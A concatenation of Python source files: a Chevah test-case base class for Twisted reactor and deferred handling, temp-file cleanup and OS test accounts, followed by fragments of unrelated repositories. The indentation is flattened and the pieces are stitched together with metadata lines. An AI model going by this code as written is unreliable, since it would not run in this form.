def _threadPoolThreads(self):
"""
        Return current threads from the pool, or an empty list when the
        threadpool does not exist.
"""
if not reactor.threadpool:
return []
else:
return reactor.threadpool.threads
def _threadPoolWorking(self):
"""
        Return working threads from the pool, or an empty list when the
        threadpool does not exist or has no job.
"""
if not reactor.threadpool:
return []
else:
return reactor.threadpool.working
@classmethod
def _cleanReactor(cls):
"""
Remove all delayed calls, readers and writers from the reactor.
This is only for cleanup purpose and should not be used by normal
tests.
"""
if not reactor:
return
try:
reactor.removeAll()
except (RuntimeError, KeyError):
# FIXME:863:
            # When running threaded tests, the reactor is touched from the test
            # case itself, which runs in one thread, and from the fixtures/cleanup
            # code, which is executed from another thread.
            # removeAll might fail since it detects that internal state
            # is changed from another source.
pass
reactor.threadCallQueue = []
for delayed_call in reactor.getDelayedCalls():
try:
delayed_call.cancel()
except (ValueError, AttributeError):
# AlreadyCancelled and AlreadyCalled are ValueError.
# Might be canceled from the separate thread.
# AttributeError can occur when we do multi-threading.
pass
def _raiseReactorTimeoutError(self, timeout):
"""
        Signal a timeout error while executing the reactor.
"""
self._timeout_reached = True
failure = AssertionError(
'Reactor took more than %.2f seconds to execute.' % timeout)
self._reactor_timeout_failure = failure
def _initiateTestReactor(self, timeout):
"""
Do the steps required to initiate a reactor for testing.
"""
self._timeout_reached = False
# Set up timeout.
self._reactor_timeout_call = reactor.callLater(
timeout, self._raiseReactorTimeoutError, timeout)
# Don't start the reactor if it is already started.
# This can happen if we prevent stop in a previous run.
if reactor._started:
return
reactor._startedBefore = False
reactor._started = False
reactor._justStopped = False
reactor.startRunning()
def _iterateTestReactor(self, debug=False):
"""
Iterate the reactor.
"""
reactor.runUntilCurrent()
if debug: # noqa:cover
            # When debug is enabled, iterate using a small delay in steps
            # to produce much better debug output.
            # Otherwise the debug messages will flood the output.
print (
u'delayed: %s\n'
u'threads: %s\n'
u'writers: %s\n'
u'readers: %s\n'
u'threadpool size: %s\n'
u'threadpool threads: %s\n'
u'threadpool working: %s\n'
u'\n' % (
self._reactorQueueToString(),
reactor.threadCallQueue,
reactor.getWriters(),
reactor.getReaders(),
reactor.getThreadPool().q.qsize(),
self._threadPoolThreads(),
self._threadPoolWorking(),
)
)
t2 = reactor.timeout()
            # For testing we want to force the reactor to wake at an
            # interval of at most 1 second.
if t2 is None or t2 > 1:
t2 = 0.1
t = reactor.running and t2
reactor.doIteration(t)
else:
# FIXME:4428:
# When not executed in debug mode, some test will fail as they
# will not spin the reactor.
# To not slow down all the tests, we run with a very small value.
reactor.doIteration(0.000001)
def _shutdownTestReactor(self, prevent_stop=False):
"""
Called at the end of a test reactor run.
When prevent_stop=True, the reactor will not be stopped.
"""
if not self._timeout_reached:
# Everything fine, disable timeout.
if (
self._reactor_timeout_call and
not self._reactor_timeout_call.cancelled
):
self._reactor_timeout_call.cancel()
if prevent_stop:
# Don't continue with stop procedure.
return
# Let the reactor know that we want to stop reactor.
reactor.stop()
# Let the reactor run one more time to execute the stop code.
reactor.iterate()
# Set flag to fake a clean reactor.
reactor._startedBefore = False
reactor._started = False
reactor._justStopped = False
reactor.running = False
# Start running has consumed the startup events, so we need
# to restore them.
reactor.addSystemEventTrigger(
'during', 'startup', reactor._reallyStartRunning)
def _assertReactorIsClean(self):
"""
Check that the reactor has no delayed calls, readers or writers.
This should only be called at teardown.
"""
if reactor is None:
return
def raise_failure(location, reason):
raise AssertionError(
'Reactor is not clean. %s: %s' % (location, reason))
if reactor._started: # noqa:cover
# Reactor was not stopped, so stop it before raising the error.
self._shutdownTestReactor()
raise AssertionError('Reactor was not stopped.')
# Look at threads queue.
if len(reactor.threadCallQueue) > 0:
raise_failure('queued threads', reactor.threadCallQueue)
if reactor.threadpool and len(reactor.threadpool.working) > 0:
raise_failure('active threads', reactor.threadCallQueue)
pool_queue = self._threadPoolQueue()
if pool_queue:
            raise_failure('threadpool queue', pool_queue)
        if self._threadPoolWorking():
            raise_failure('threadpool working', self._threadPoolWorking())
        if self._threadPoolThreads():
            raise_failure('threadpool threads', self._threadPoolThreads())
if len(reactor.getWriters()) > 0: # noqa:cover
raise_failure('writers', text_type(reactor.getWriters()))
for reader in reactor.getReaders():
excepted = False
for reader_type in self.EXCEPTED_READERS:
if isinstance(reader, reader_type):
excepted = True
break
if not excepted: # noqa:cover
raise_failure('readers', text_type(reactor.getReaders()))
for delayed_call in reactor.getDelayedCalls():
if delayed_call.active():
delayed_str = self._getDelayedCallName(delayed_call)
if delayed_str in self.EXCEPTED_DELAYED_CALLS:
continue
raise_failure('delayed calls', delayed_str)
def _runDeferred(
self, deferred, timeout=None, debug=False, prevent_stop=False):
"""
This is low level method. In most tests you would like to use
`getDeferredFailure` or `getDeferredResult`.
Run the deferred in the reactor loop.
Starts the reactor, waits for deferred execution,
raises error in timeout, stops the reactor.
This will do recursive calls, in case the original deferred returns
another deferred.
Usage::
checker = mk.credentialsChecker()
credentials = mk.credentials()
deferred = checker.requestAvatarId(credentials)
self._runDeferred(deferred)
self.assertIsNotFailure(deferred)
self.assertEqual('something', deferred.result)
"""
if not isinstance(deferred, Deferred):
raise AssertionError('This is not a deferred.')
if timeout is None:
timeout = self.DEFERRED_TIMEOUT
try:
self._initiateTestReactor(timeout=timeout)
self._executeDeferred(deferred, timeout, debug=debug)
finally:
self._shutdownTestReactor(
prevent_stop=prevent_stop)
def _executeDeferred(self, deferred, timeout, debug):
"""
Does the actual deferred execution.
"""
if not deferred.called:
deferred_done = False
while not deferred_done:
self._iterateTestReactor(debug=debug)
deferred_done = deferred.called
if self._timeout_reached:
raise AssertionError(
'Deferred took more than %d to execute.' % timeout)
# Check executing all deferred from chained callbacks.
result = deferred.result
while isinstance(result, Deferred):
self._executeDeferred(result, timeout=timeout, debug=debug)
result = deferred.result
def executeReactor(self, timeout=None, debug=False, run_once=False):
"""
Run reactor until no more delayed calls, readers or
writers or threads are in the queues.
Set run_once=True to only run the reactor once. This is useful if
you have persistent deferred which will be removed only at the end
of test.
        Only use this for very high level integration code, where you don't
        have the chance to get a "root" deferred.
In most tests you would like to use one of the
`getDeferredFailure` or `getDeferredResult`.
Usage::
protocol = mk.makeFTPProtocol()
transport = mk.makeStringTransportProtocol()
protocol.makeConnection(transport)
transport.protocol = protocol
protocol.lineReceived('FEAT')
self.executeReactor()
result = transport.value()
self.assertStartsWith('211-Features:\n', result)
"""
if timeout is None:
timeout = self.DEFERRED_TIMEOUT
self._initiateTestReactor(timeout=timeout)
# Set it to True to enter the first loop.
have_callbacks = True
while have_callbacks and not self._timeout_reached:
self._iterateTestReactor(debug=debug)
have_callbacks = False
# Check for active jobs in thread pool.
if reactor.threadpool:
if (
reactor.threadpool.working or
(reactor.threadpool.q.qsize() > 0)
):
time.sleep(0.01)
have_callbacks = True
continue
# Look at delayed calls.
for delayed in reactor.getDelayedCalls():
# We skip our own timeout call.
if delayed is self._reactor_timeout_call:
continue
if not delayed.func:
# Was already called.
continue
delayed_str = self._getDelayedCallName(delayed)
is_exception = False
for excepted_callback in self.EXCEPTED_DELAYED_CALLS:
if excepted_callback in delayed_str:
is_exception = True
if not is_exception:
# No need to look for other delayed calls.
have_callbacks = True
break
# No need to look for other things as we already know that we need
# to wait at least for delayed calls.
if have_callbacks:
continue
if run_once:
if have_callbacks:
raise AssertionError(
'Reactor queue still contains delayed deferred.\n'
'%s' % (self._reactorQueueToString()))
break
# Look at writers buffers:
if len(reactor.getWriters()) > 0:
have_callbacks = True
continue
for reader in reactor.getReaders():
have_callbacks = True
for excepted_reader in self.EXCEPTED_READERS:
if isinstance(reader, excepted_reader):
have_callbacks = False
break
if have_callbacks:
break
if have_callbacks:
continue
# Look at threads queue and active thread.
if len(reactor.threadCallQueue) > 0:
have_callbacks = True
continue
if reactor.threadpool and len(reactor.threadpool.working) > 0:
have_callbacks = True
continue
self._shutdownTestReactor()
def executeDelayedCalls(self, timeout=None, debug=False):
"""
Run the reactor until no more delayed calls are scheduled.
This will wait for delayed calls to be executed and will not stop
the reactor.
"""
if timeout is None:
timeout = self.DEFERRED_TIMEOUT
self._initiateTestReactor(timeout=timeout)
while not self._timeout_reached:
self._iterateTestReactor(debug=debug)
delayed_calls = reactor.getDelayedCalls()
try:
delayed_calls.remove(self._reactor_timeout_call)
except ValueError: # noqa:cover
# Timeout might be no longer be there.
pass
if not delayed_calls:
break
self._shutdownTestReactor(prevent_stop=True)
if self._reactor_timeout_failure is not None:
self._reactor_timeout_failure = None
# We stop the reactor on failures.
self._shutdownTestReactor()
raise AssertionError(
'executeDelayedCalls took more than %s' % (timeout,))
def executeReactorUntil(
self, callable, timeout=None, debug=False, prevent_stop=True):
"""
Run the reactor until callable returns `True`.
"""
if timeout is None:
timeout = self.DEFERRED_TIMEOUT
self._initiateTestReactor(timeout=timeout)
while not self._timeout_reached:
self._iterateTestReactor(debug=debug)
if callable(reactor):
break
self._shutdownTestReactor(prevent_stop=prevent_stop)
def iterateReactor(self, count=1, timeout=None, debug=False):
"""
Iterate the reactor without stopping it.
"""
iterations = [False] * (count - 1)
iterations.append(True)
self.executeReactorUntil(
lambda _: iterations.pop(0), timeout=timeout, debug=debug)
def iterateReactorWithStop(self, count=1, timeout=None, debug=False):
"""
Iterate the reactor and stop it at the end.
"""
iterations = [False] * (count - 1)
iterations.append(True)
self.executeReactorUntil(
lambda _: iterations.pop(0),
timeout=timeout,
debug=debug,
prevent_stop=False,
)
def iterateReactorForSeconds(self, duration=1, debug=False):
"""
        Iterate the reactor for `duration` seconds.
"""
start = time.time()
self.executeReactorUntil(
lambda _: time.time() - start > duration,
timeout=duration + 0.1,
debug=debug,
prevent_stop=False,
)
def _getDelayedCallName(self, delayed_call):
"""
Return a string representation of the delayed call.
"""
raw_name = text_type(delayed_call.func)
raw_name = raw_name.replace('<function ', '')
raw_name = raw_name.replace('<bound method ', '')
return raw_name.split(' ', 1)[0]
def getDeferredFailure(
self, deferred, timeout=None, debug=False, prevent_stop=False):
"""
Run the deferred and return the failure.
Usage::
checker = mk.credentialsChecker()
credentials = mk.credentials()
deferred = checker.requestAvatarId(credentials)
failure = self.getDeferredFailure(deferred)
self.assertFailureType(AuthenticationError, failure)
"""
self._runDeferred(
deferred,
timeout=timeout,
debug=debug,
prevent_stop=prevent_stop,
)
self.assertIsFailure(deferred)
failure = deferred.result
self.ignoreFailure(deferred)
return failure
def successResultOf(self, deferred):
"""
Return the current success result of C{deferred} or raise
C{self.failException}.
@param deferred: A L{Deferred<twisted.internet.defer.Deferred>} which
has a success result. This means
L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or
L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has
been called on it and it has reached the end of its callback chain
and the last callback or errback returned a
non-L{failure.Failure}.
@type deferred: L{Deferred<twisted.internet.defer.Deferred>}
@raise SynchronousTestCase.failureException: If the
L{Deferred<twisted.internet.defer.Deferred>} has no result or has
a failure result.
@return: The result of C{deferred}.
"""
# FIXME:1370:
# Remove / re-route this code after upgrading to Twisted 13.0.
result = []
deferred.addBoth(result.append)
if not result:
self.fail(
"Success result expected on %r, found no result instead" % (
deferred,))
elif isinstance(result[0], Failure):
self.fail(
"Success result expected on %r, "
"found failure result instead:\n%s" % (
deferred, result[0].getBriefTraceback().decode(
'utf-8', errors='replace')))
else:
return result[0]
def failureResultOf(self, deferred, *expectedExceptionTypes):
"""
Return the current failure result of C{deferred} or raise
C{self.failException}.
@param deferred: A L{Deferred<twisted.internet.defer.Deferred>} which
has a failure result. This means
L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or
L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has
been called on it and it has reached the end of its callback chain
and the last callback or errback raised an exception or returned a
L{failure.Failure}.
@type deferred: L{Deferred<twisted.internet.defer.Deferred>}
@param expectedExceptionTypes: Exception types to expect - if
provided, and the the exception wrapped by the failure result is
not one of the types provided, then this test will fail.
@raise SynchronousTestCase.failureException: If the
L{Deferred<twisted.internet.defer.Deferred>} has no result, has a
success result, or has an unexpected failure result.
@return: The failure result of C{deferred}.
@rtype: L{failure.Failure}
"""
# FIXME:1370:
# Remove / re-route this code after upgrading to Twisted 13
result = []
deferred.addBoth(result.append)
if not result:
self.fail(
"Failure result expected on %r, found no result instead" % (
deferred,))
elif not isinstance(result[0], Failure):
self.fail(
"Failure result expected on %r, "
"found success result (%r) instead" % (deferred, result[0]))
elif (expectedExceptionTypes and
not result[0].check(*expectedExceptionTypes)):
expectedString = " or ".join([
'.'.join((t.__module__, t.__name__)) for t in
expectedExceptionTypes])
self.fail(
"Failure of type (%s) expected on %r, "
"found type %r instead: %s" % (
expectedString, deferred, result[0].type,
result[0].getBriefTraceback().decode(
'utf-8', errors='replace')))
else:
return result[0]
def assertNoResult(self, deferred):
"""
Assert that C{deferred} does not have a result at this point.
If the assertion succeeds, then the result of C{deferred} is left
unchanged. Otherwise, any L{failure.Failure} result is swallowed.
@param deferred: A L{Deferred<twisted.internet.defer.Deferred>}
without a result. This means that neither
L{Deferred.callback<twisted.internet.defer.Deferred.callback>} nor
L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has
been called, or that the
L{Deferred<twisted.internet.defer.Deferred>} is waiting on another
L{Deferred<twisted.internet.defer.Deferred>} for a result.
@type deferred: L{Deferred<twisted.internet.defer.Deferred>}
@raise SynchronousTestCase.failureException: If the
L{Deferred<twisted.internet.defer.Deferred>} has a result.
"""
# FIXME:1370:
# Remove / re-route this code after upgrading to Twisted 13
result = []
def cb(res):
result.append(res)
return res
deferred.addBoth(cb)
if result:
# If there is already a failure, the self.fail below will
# report it, so swallow it in the deferred
deferred.addErrback(lambda _: None)
self.fail(
"No result expected on %r, found %r instead" % (
deferred, result[0]))
def getDeferredResult(
self, deferred, timeout=None, debug=False, prevent_stop=False):
"""
Run the deferred and return the result.
Usage::
checker = mk.credentialsChecker()
credentials = mk.credentials()
deferred = checker.requestAvatarId(credentials)
result = self.getDeferredResult(deferred)
self.assertEqual('something', result)
"""
self._runDeferred(
deferred,
timeout=timeout,
debug=debug,
prevent_stop=prevent_stop,
)
self.assertIsNotFailure(deferred)
return deferred.result
def assertWasCalled(self, deferred):
"""
Check that deferred was called.
"""
if not deferred.called:
raise AssertionError('This deferred was not called yet.')
def ignoreFailure(self, deferred):
"""
Ignore the current failure on the deferred.
It transforms an failure into result `None` so that the failure
will not be raised at reactor shutdown for not being handled.
"""
deferred.addErrback(lambda failure: None)
def assertIsFailure(self, deferred):
"""
Check that deferred is a failure.
"""
if not isinstance(deferred.result, Failure):
raise AssertionError('Deferred is not a failure.')
def assertIsNotFailure(self, deferred):
"""
Raise assertion error if deferred is a Failure.
The failed deferred is handled by this method, to avoid propagating
the error into the reactor.
"""
self.assertWasCalled(deferred)
if isinstance(deferred.result, Failure):
error = deferred.result
self.ignoreFailure(deferred)
raise AssertionError(
'Deferred contains a failure: %s' % (error))
def _get_os_version():
"""
On non-Linux this is just the os_name.
On Linux is the distribution name and the version.
On Windows it is the `nt` followed by the major and minor NT version.
It is not the marketing name.
We only support the Windows NT family.
See: https://en.wikipedia.org/wiki/Windows_NT#Releases
On OSX it returns `osx` followed by the version.
It is not the version of the underlying Darwin OS.
See: https://en.wikipedia.org/wiki/MacOS#Release_history
"""
if os.name == 'nt':
parts = platform.version().split('.')
return 'nt-%s.%s' % (parts[0], parts[1])
# We are now in Unix zone.
os_name = os.uname()[0].lower()
if os_name == 'darwin':
parts = platform.mac_ver()[0].split('.')
return 'osx-%s.%s' % (parts[0], parts[1])
if os_name == 'sunos':
parts = platform.release().split('.')
return 'solaris-%s' % (parts[1],)
if os_name == 'aix': # noqa:cover
return 'aix-%s.%s' % (platform.version(), platform.release())
if os_name != 'linux':
return process_capabilities.os_name
# We delay the import as it will call lsb_release.
import ld
distro_name = ld.id()
if distro_name == 'arch':
# Arch has no version.
return 'arch'
if distro_name in ['centos', 'ol']:
# Normalize all RHEL variants.
distro_name = 'rhel'
distro_version = ld.version().split('.', 1)[0]
return '%s-%s' % (distro_name, distro_version)
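# Illustrative examples of the values returned above (assumed, not exhaustive):
# 'nt-10.0' for Windows 10, 'osx-10.13' for macOS High Sierra, 'rhel-7' for
# CentOS 7 / RHEL 7, 'ubuntu-16' for Ubuntu 16.04, and 'arch' for Arch Linux.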
def _get_cpu_type():
"""
Return the CPU type as used in the brink.sh script.
"""
base = platform.processor()
if base == 'aarch64':
return 'arm64'
if base == 'x86_64':
return 'x64'
return base
_CI_NAMES = Bunch(
LOCAL='local',
GITHUB='github-actions',
TRAVIS='travis',
BUILDBOT='buildbot',
UNKNOWN='unknown-ci',
AZURE='azure-pipelines',
)
def _get_ci_name():
"""
Return the name of the CI on which the tests are currently executed.
"""
if os.environ.get('BUILDBOT', '').lower() == 'true':
return _CI_NAMES.BUILDBOT
if os.environ.get('GITHUB_ACTIONS', '').lower() == 'true':
return _CI_NAMES.GITHUB
if os.environ.get('TRAVIS', '').lower() == 'true':
return _CI_NAMES.TRAVIS
if os.environ.get('INFRASTRUCTURE', '') == 'AZUREPIPELINES':
return _CI_NAMES.AZURE
if os.environ.get('CI', '').lower() == 'true':
return _CI_NAMES.UNKNOWN
return _CI_NAMES.LOCAL
class ChevahTestCase(TwistedTestCase, AssertionMixin):
"""
Test case for Chevah tests.
Checks that temporary folder is clean at exit.
"""
os_name = process_capabilities.os_name
os_family = process_capabilities.os_family
os_version = _get_os_version()
cpu_type = process_capabilities.cpu_type
ci_name = _get_ci_name()
CI = _CI_NAMES
TEST_LANGUAGE = os.getenv('TEST_LANG', 'EN')
# List of partial thread names to ignore during the tearDown.
# No need for the full thread name
excepted_threads = [
'MainThread',
'threaded_reactor',
'GlobalPool-WorkerHandler',
'GlobalPool-TaskHandler',
'GlobalPool-ResultHandler',
'PoolThread-twisted.internet.reactor',
]
# We assume that hostname does not change during test and this
# should save a few DNS queries.
hostname = _get_hostname()
Bunch = Bunch
Mock = Mock
#: Obsolete. Please use self.patch and self.patchObject.
Patch = patch
_environ_user = None
_drop_user = '-'
def setUp(self):
super(ChevahTestCase, self).setUp()
self.__cleanup__ = []
self._cleanup_stack = []
self._teardown_errors = []
self.test_segments = None
def tearDown(self):
self.callCleanup()
self._checkTemporaryFiles()
threads = threading.enumerate()
if len(threads) > 1:
for thread in threads:
thread_name = thread.getName()
if self._isExceptedThread(thread_name):
continue
self._teardown_errors.append(AssertionError(
'There are still active threads, '
'beside the main thread: %s - %s' % (
thread_name, threads)))
super(ChevahTestCase, self).tearDown()
errors, self._teardown_errors = self._teardown_errors, None
if errors:
raise AssertionError('Cleanup errors: %r' % (errors,))
def _isExceptedThread(self, name):
"""
Return `True` if is OK for thread to exist after test is done.
"""
for exception in self.excepted_threads:
if name in exception:
return True
if exception in name:
return True
return False
def addCleanup(self, function, *args, **kwargs):
"""
Overwrite unit-test behaviour to run cleanup method before tearDown.
"""
self.__cleanup__.append((function, args, kwargs))
def callCleanup(self):
"""
Call all cleanup methods.
If a cleanup fails, the next cleanups will continue to be called and
the first failure is raised.
"""
for function, args, kwargs in reversed(self.__cleanup__):
try:
function(*args, **kwargs)
except Exception as error: # noqa:cover
self._teardown_errors.append(error)
self.__cleanup__ = []
def enterCleanup(self):
"""
Called when start using stacked cleanups.
"""
self._cleanup_stack.append(self.__cleanup__)
self.__cleanup__ = []
def exitCleanup(self):
"""
To be called at the end of a stacked cleanup.
"""
self.callCleanup()
self.__cleanup__ = self._cleanup_stack.pop()
@contextlib.contextmanager
def stackedCleanup(self):
"""
Context manager for stacked cleanups.
"""
try:
self.enterCleanup()
yield
finally:
self.exitCleanup()
def _checkTemporaryFiles(self):
"""
Check that no temporary files or folders are present.
"""
# FIXME:922:
# Move all filesystem checks into a specialized class
if self.test_segments:
if mk.fs.isFolder(self.test_segments):
mk.fs.deleteFolder(
self.test_segments, recursive=True)
else:
mk.fs.deleteFile(self.test_segments)
checks = [
self.assertTempIsClean,
self.assertWorkingFolderIsClean,
]
errors = []
for check in checks:
try:
check()
except AssertionError as error:
errors.append(error.message)
if errors: # noqa:cover
self._teardown_errors.append(AssertionError(
'There are temporary files or folders left over.\n %s' % (
'\n'.join(errors))))
def shortDescription(self): # noqa:cover
"""
The short description for the test.
bla.bla.tests. is removed.
The format is customized for Chevah Nose runner.
This is only called when we run with -v or we show the error.
"""
class_name = text_type(self.__class__)[8:-2]
class_name = class_name.replace('.Test', ':Test')
tests_start = class_name.find('.tests.') + 7
class_name = class_name[tests_start:]
return "%s - %s.%s" % (
self._testMethodName,
class_name,
self._testMethodName)
def assertRaises(self, exception_class, callback=None, *args, **kwargs):
"""
Wrapper around the stdlib call to allow non-context usage.
"""
super_assertRaises = super(ChevahTestCase, self).assertRaises
if callback is None:
return super_assertRaises(exception_class)
with super_assertRaises(exception_class) as context:
callback(*args, **kwargs)
return context.exception
def assertSequenceEqual(self, first, second, msg, seq_type):
super(ChevahTestCase, self).assertSequenceEqual(
first, second, msg, seq_type)
for first_element, second_element in zip(first, second):
self.assertEqual(first_element, second_element)
def assertDictEqual(self, first, second, msg):
super(ChevahTestCase, self).assertDictEqual(first, second, msg)
first_keys = sorted(first.keys())
second_keys = sorted(second.keys())
first_values = [first[key] for key in first_keys]
second_values = [second[key] for key in second_keys]
self.assertSequenceEqual(first_keys, second_keys, msg, list)
self.assertSequenceEqual(first_values, second_values, msg, list)
def assertSetEqual(self, first, second, msg):
super(ChevahTestCase, self).assertSetEqual(first, second, msg)
first_elements = sorted(first)
second_elements = sorted(second)
self.assertSequenceEqual(first_elements, second_elements, msg, list)
def _baseAssertEqual(self, first, second, msg=None):
"""
Update to stdlib to make sure we don't compare str with unicode.
"""
if (
isinstance(first, text_type) and
not isinstance(second, text_type)
): # noqa:cover
if not msg:
msg = u'First is unicode while second is str for "%s".' % (
first,)
raise AssertionError(msg.encode('utf-8'))
if (
not isinstance(first, text_type) and
isinstance(second, text_type)
): # noqa:cover
if not msg:
msg = u'First is str while second is unicode for "%s".' % (
first,)
raise AssertionError(msg.encode('utf-8'))
return super(ChevahTestCase, self)._baseAssertEqual(
first, second, msg=msg)
@staticmethod
def getHostname():
"""
Return the hostname of the current system.
"""
return _get_hostname()
@classmethod
def initialize(cls, drop_user):
"""
Initialize the testing environment.
"""
cls._drop_user = drop_user
os.environ['DROP_USER'] = drop_user
if 'LOGNAME' in os.environ and 'USER' not in os.environ:
os.environ['USER'] = os.environ['LOGNAME']
if 'USER' in os.environ and 'USERNAME' not in os.environ:
os.environ['USERNAME'] = os.environ['USER']
if 'USERNAME' in os.environ and 'USER' not in os.environ:
os.environ['USER'] = os.environ['USERNAME']
cls._environ_user = os.environ['USER']
cls.cleanTemporaryFolder()
@classmethod
def dropPrivileges(cls):
'''Drop privileges to normal users.'''
if cls._drop_user == '-':
return
os.environ['USERNAME'] = cls._drop_user
os.environ['USER'] = cls._drop_user
# Test suite should be started as root and we drop effective user
# privileges.
system_users.dropPrivileges(username=cls._drop_user)
@staticmethod
def skipTest(message=''):
'''Return a SkipTest exception.'''
return SkipTest(message)
@property
def _caller_success_member(self):
'''Retrieve the 'success' member from the test case.'''
success_state = None
# We search starting with second stack, since first stack is the
# current stack and we don't care about it.
for level in inspect.stack()[1:]:
try:
success_state = level[0].f_locals['success']
break
except KeyError:
success_state = None
if success_state is None:
raise AssertionError('Failed to find "success" attribute.')
return success_state
@staticmethod
def patch(*args, **kwargs):
"""
Helper for generic patching.
"""
return patch(*args, **kwargs)
@staticmethod
def patchObject(*args, **kwargs):
"""
Helper for patching objects.
"""
return patch.object(*args, **kwargs)
def now(self):
"""
Return current Unix timestamp.
"""
return time.time()
@classmethod
def cleanTemporaryFolder(cls):
"""
Clean all test files from temporary folder.
Return a list of members which were removed.
"""
return cls._cleanFolder(mk.fs.temp_segments)
@classmethod
def cleanWorkingFolder(cls):
path = mk.fs.getAbsoluteRealPath('.')
segments = mk.fs.getSegmentsFromRealPath(path)
return cls._cleanFolder(segments, only_marked=True)
@classmethod
def _cleanFolder(cls, folder_segments, only_marked=False):
"""
Clean all test files from folder_segments.
Return a list of members which were removed.
"""
if not mk.fs.exists(folder_segments):
return []
# In case we are running the test suite as super user,
# we use super filesystem for cleaning.
if cls._environ_user == cls._drop_user:
temp_avatar = SuperAvatar()
else:
temp_avatar = DefaultAvatar()
temp_filesystem = LocalFilesystem(avatar=temp_avatar)
temp_members = []
for member in (temp_filesystem.getFolderContent(folder_segments)):
if only_marked and member.find(TEST_NAME_MARKER) == -1:
continue
temp_members.append(member)
segments = folder_segments[:]
segments.append(member)
if temp_filesystem.isFolder(segments):
temp_filesystem.deleteFolder(segments, recursive=True)
else:
temp_filesystem.deleteFile(segments)
return temp_members
@classmethod
def getPeakMemoryUsage(cls):
"""
Return maximum memory usage in kilo bytes.
"""
if cls.os_family == 'posix':
import resource
return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
elif cls.os_family == 'nt':
from wmi import WMI
local_wmi = WMI('.')
query = (
u'SELECT PeakWorkingSetSize '
u'FROM Win32_Process '
u'WHERE Handle=%d' % os.getpid())
result = local_wmi.query(query.encode('utf-8'))
peak_working_set_size = int(result[0].PeakWorkingSetSize)
# FIXME:2099:
# Windows XP reports value in bytes, instead of Kilobytes.
return int(peak_working_set_size)
else:
raise AssertionError('OS not supported.')
def folderInTemp(self, *args, **kwargs):
"""
Create a folder in the default temp folder and mark it for cleanup.
"""
kwargs['cleanup'] = self.addCleanup
return mk.fs.folderInTemp(*args, **kwargs)
def fileInTemp(self, *args, **kwargs):
"""
Create a file in the default temp folder and mark it for cleanup.
"""
kwargs['cleanup'] = self.addCleanup
return mk.fs.fileInTemp(*args, **kwargs)
def assertIn(self, target, source):
"""
Overwrite stdlib to swap the arguments.
"""
if source not in target:
message = u'%s not in %s.' % (repr(source), repr(target))
raise AssertionError(message.encode('utf-8'))
def assertIsInstance(self, expected_type, value, msg=None):
"""
Raise an exception if `value` is not an instance of `expected_type`
"""
# In Python 2.7 isInstance is already defined, but with swapped
# arguments.
if not inspect.isclass(expected_type):
expected_type, value = value, expected_type
if not isinstance(value, expected_type):
raise AssertionError(
"Expecting type %s, but got %s. %s" % (
expected_type, type(value), msg))
def tempPath(self, prefix='', suffix=''):
"""
Return (path, segments) for a path which is not created yet.
"""
return mk.fs.makePathInTemp(prefix=prefix, suffix=suffix)
def tempPathCleanup(self, prefix='', suffix=''):
"""
Return (path, segments) for a path which is not created yet but which
will be automatically removed.
"""
return mk.fs.pathInTemp(
cleanup=self.addCleanup, prefix=prefix, suffix=suffix)
def tempFile(self, content='', prefix='', suffix='', cleanup=True):
"""
Return (path, segments) for a new file created in temp which is
auto cleaned.
"""
segments = mk.fs.createFileInTemp(prefix=prefix, suffix=suffix)
path = mk.fs.getRealPathFromSegments(segments)
if cleanup:
self.addCleanup(mk.fs.deleteFile, segments)
try:
opened_file = mk.fs.openFileForWriting(segments)
opened_file.write(content)
finally:
opened_file.close()
return (path, segments)
def tempFolder(self, name=None, prefix='', suffix=''):
"""
Create a new temp folder and return its path and segments, which is
auto cleaned.
"""
segments = mk.fs.createFolderInTemp(
foldername=name, prefix=prefix, suffix=suffix)
path = mk.fs.getRealPathFromSegments(segments)
self.addCleanup(mk.fs.deleteFolder, segments, recursive=True)
return (path, segments)
class FileSystemTestCase(ChevahTestCase):
"""
Common test case for all file-system tests using a real OS account.
"""
@classmethod
def setUpClass(cls):
# FIXME:924:
# Disabled when we can not find the home folder path.
if not process_capabilities.get_home_folder:
raise cls.skipTest()
super(FileSystemTestCase, cls).setUpClass()
cls.os_user = cls.setUpTestUser()
home_folder_path = system_users.getHomeFolder(
username=cls.os_user.name, token=cls.os_user.token)
cls.avatar = mk.makeFilesystemOSAvatar(
name=cls.os_user.name,
home_folder_path=home_folder_path,
token=cls.os_user.token,
)
cls.filesystem = LocalFilesystem(avatar=cls.avatar)
@classmethod
def tearDownClass(cls):
if not cls.os_user.windows_create_local_profile:
os_administration.deleteHomeFolder(cls.os_user)
os_administration.deleteUser(cls.os_user)
super(FileSystemTestCase, cls).tearDownClass()
@classmethod
def setUpTestUser(cls):
"""
Set-up OS user for file system testing.
"""
from chevah.compat.testing import TEST_ACCOUNT_GROUP
user = mk.makeTestUser(home_group=TEST_ACCOUNT_GROUP)
os_administration.addUser(user)
return user
def setUp(self):
super(FileSystemTestCase, self).setUp()
# Initialized only to clean the home folder.
test_filesystem = LocalTestFilesystem(avatar=self.avatar)
test_filesystem.cleanHomeFolder()
class OSAccountFileSystemTestCase(FileSystemTestCase):
"""
Test case for tests that need a dedicated local OS account present.
"""
#: User will be created before running the test case and removed on
#: teardown.
CREATE_TEST_USER = None
@classmethod
def setUpTestUser(cls):
"""
Add `CREATE_TEST_USER` to local OS.
"""
os_administration.addUser(cls.CREATE_TEST_USER)
return cls.CREATE_TEST_USER
| 2 | 2 |
web/snowflake.py | jphacks/C_2118 | 0 | 1237 | <gh_stars>0
import time
class Snowflake:
def __init__(self, init_serial_no=0):
self.machine_id = 0
self.epoch = 0
self.serial_no = init_serial_no
def generate(self):
unique_id = (
((int(time.time() * 1000) - self.epoch) & 0x1FFFFFFFFFF) << 22
| (self.machine_id & 0x3FF) << 12
| (self.serial_no & 0xFFF)
)
self.serial_no += 1
return unique_id
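# --- Usage sketch (added for illustration; not part of the original module) ---
# With the defaults above (machine_id=0, epoch=0) each ID packs the current
# millisecond timestamp into the upper bits, so IDs increase over time.
if __name__ == "__main__":
    generator = Snowflake()
    print([generator.generate() for _ in range(3)])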
| 2.59375 | 3 |
src/metarl/tf/plotter/__init__.py | icml2020submission6857/metarl | 2 | 1238 | from metarl.tf.plotter.plotter import Plotter
__all__ = ['Plotter']
| 1.148438 | 1 |
generative_deep_learning/build_network.py | slaily/deep-learning-bits | 0 | 1239 | from keras import layers
import keras
import numpy as np

